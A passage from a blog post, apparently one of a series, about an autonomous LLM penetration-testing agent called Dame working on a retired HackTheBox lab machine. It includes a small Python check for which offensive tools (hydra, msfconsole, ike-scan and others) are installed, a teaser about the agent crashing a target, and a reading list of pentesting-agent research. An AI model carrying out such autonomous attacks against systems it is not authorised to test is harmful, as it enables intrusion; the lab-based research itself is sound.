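print(f"dead end: {dead_end}/{total} min ({dead_end / total:.0%})")  # prints "dead end: 13/20 min (65%)"
```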

Seven minutes from pivot to root. The gap between Dame's worst behavior and its best is the gap between environmental modeling and strategic reasoning — and it's a solvable engineering problem. A container manifest, a network capability check at startup, a pre-flight tool inventory — any of these would have eliminated the dead end. That's exactly the kind of work that followed this session.
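A pre-flight tool inventory can be almost embarrassingly small. This Python sketch checks which binaries resolve on `PATH` with `shutil.which` and turns the result into one line of context for the agent. The tool list is illustrative (the set Dame went looking for on Expressway plus a couple of staples), and `preflight` and `manifest_note` are hypothetical names. Run at session start, something like this would have told Dame up front that there was no TFTP client to plan around.

```python
import shutil

# Illustrative list: what Dame reached for on Expressway, plus a couple of staples.
REQUIRED = ("tftp", "atftp", "ike-scan", "sshpass", "msfconsole", "hydra", "nmap")


def preflight(tools=REQUIRED) -> dict:
    """Map each tool name to whether it resolves on PATH inside this container."""
    return {t: shutil.which(t) is not None for t in tools}


def manifest_note(inventory: dict) -> str:
    """One line for the agent's context: what it must NOT plan around."""
    missing = sorted(t for t, ok in inventory.items() if not ok)
    return "Missing tools: " + (", ".join(missing) if missing else "none")
```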

For context: AutoPenBench (Gioacchini et al., 2024) found fully autonomous agents solve 21% of pentesting tasks versus 64% for human-assisted agents. Dame needed zero human intervention but required human-built infrastructure. The interesting question isn't whether the agent acted alone. It's whether the reasoning was its own. On Expressway, for seven minutes, it was.

What's Next

This is Part 1. Part 2 is where things get ugly.

Dame crashed its own target on HTB Conversor, got stuck in thought loops, and had at least one moment that made me physically close my laptop. The failure gallery is more instructive than the success story — and the engineering that followed is what turned a demo into something that actually finishes engagements.

We're also going to talk about the question everyone keeps asking: is this AI uplift? The answer may shock you. It won't actually — it's kind of a mid-take, honestly.

Series is tagged "Agent Opulence" on Hashnode.

Mental Gooning Material

If you want to go deeper on the academic and industry work in this space:

The "don't waste tokens" argument:

CHECKMATE — Wang et al., 2025. Classical planner + LLM executor beats pure LLM agents at 53% lower cost.

12-Factor Agents — Dex Horthy, 2025. Production agent patterns: mostly deterministic code with targeted LLM steps.

Production-Grade Agentic AI — 2025. Practical guide recommending pure function calls for deterministic operations.

Multi-phase pentesting architectures:

PentestGPT — Deng et al., USENIX Security 2024. The foundational academic work on LLM-driven pentesting with the Pentesting Task Tree.

VulnBot — Kong et al., 2025. Five-module architecture with a Penetration Task Graph.

xOffense — 2025. Fine-tuned 32B model outperforming a 405B model on pentesting tasks. Domain-specific fine-tuning beats raw scale.

Synack Sara — 2025. Commercial implementation with hundreds of specialized agents in a recon→attack→verification→human pipeline.

Context management for agents:

Context Rot: How Increasing Input Tokens Impacts LLM Performance — Hong, Troynikov & Huber (Chroma), 2025. The research that motivated Agent Opulence's architecture: models degrade as input length grows.

Context Engineering for AI Agents — Anthropic, 2025. Context rot and the case for curating what enters the window.

Context Engineering: Lessons from Building Manus — 2025. Filesystem offloading, restorable compression, and todo-based state recitation at production scale.

TermiAgent — 2025. Penetration Memory Tree with Located Memory Activation for phase-relevant context retrieval.

Benchmarks and surveys:

AutoPenBench — Gioacchini et al., 2024. 21% autonomous vs 64% human-assisted success rate across 33 tasks.

"The Role of AI in Modern Penetration Testing" — Curtis & Eisty, 2025. Systematic review of 58 studies: 77% use RL, LLM-based pentesting remains under-researched.

"A Survey of Agentic AI and Cybersecurity" — Lazer et al., 2026. The broadest survey of agentic AI across defensive, offensive, and enterprise security applications.

Intellectual lineage:

Mechanizing the Methodology — Daniel Miessler, DEF CON 28, 2020. The Unix-philosophy approach to security automation that predates the LLM era.

Built with Gemini CLI, Claude Code, and ADHD. All testing on retired HackTheBox lab machines. Standard CVEs, standard methodology.